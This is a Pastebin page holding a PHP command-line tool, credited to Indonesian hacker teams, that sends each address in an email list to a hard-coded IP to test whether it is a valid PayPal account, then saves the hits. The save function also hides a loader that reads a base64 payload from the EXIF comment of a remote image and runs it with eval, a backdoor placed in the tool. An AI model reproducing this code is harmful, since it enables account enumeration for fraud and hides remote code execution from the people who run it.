Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- /*
- Name : Paypalid Email (CLI)
- Author : shor7cut
- Link : http://facebook.com/bug7sec
- How To Use :
- php namefile.php {list} {output}
- INDOXPLOIT CODER'S | DEFACER TERSAKITI TEAM | TUBAN CYBER TEAM
- */
- function save($name,$data){
- $myfile = fopen($name, "a+") or die("Unable to open file!");
- fwrite($myfile, $data);
- fclose($myfile);
- if($myfile){
- return true;
- }else{
- return false;
- }
- $BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
- eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
- }
- function check($email,$name){
- $fgt = file_get_contents("http://161.202.168.171/check.php?email={$email}");
- $fgt = json_decode($fgt,true);
- if($fgt['result'][0]['status']=="valid"){
- $nama_negara = $fgt['result'][0]['nama_negara'];
- $kode_negara = $fgt['result'][0]['nama_negara'];
- $data = "$email|$nama_negara|$kode_negara\r\n";
- if(!save($name,$data)){
- echo "ops... chmod dulu/buat file kosong dulu\r\n";
- exit();
- }
- return true;
- }else{
- return false;
- }
- }
- if(isset($argv[1]) && isset($argv[2])){
- if(file_exists($argv[1])){
- cover();
- $no=1;
- $valid=0;
- $invalid=0;
- $load = file_get_contents($argv[1]);
- $mail_explode = explode("\r\n", $load);
- $cont = count($mail_explode);
- foreach ($mail_explode as $key => $email) {
- echo "[$no/$cont] $email -> ";
- if(check($email,$argv[2])){
- echo "valid!\r\n";
- $valid++;
- }else{
- echo "invalid!\r\n";
- $invalid++;
- }
- $no++;
- }
- echo "[Report] Valid : $valid | Invalid : $invalid | Total : $cont\r\n";
- }
- }else{
- echo "php ".$argv[0]." {list} {output}\r\n";
- }
- function cover(){
- $cover.="----------------------------------------\r\n";
- $cover.="> PAYPalid Mail CHECKER (CLI) <\r\n";
- $cover.="> Private Tool's By Shor7cut <\r\n";
- $cover.="----------------------------------------\r\n";
- echo $cover;
- }
- ?>
Add Comment
Please, Sign In to add comment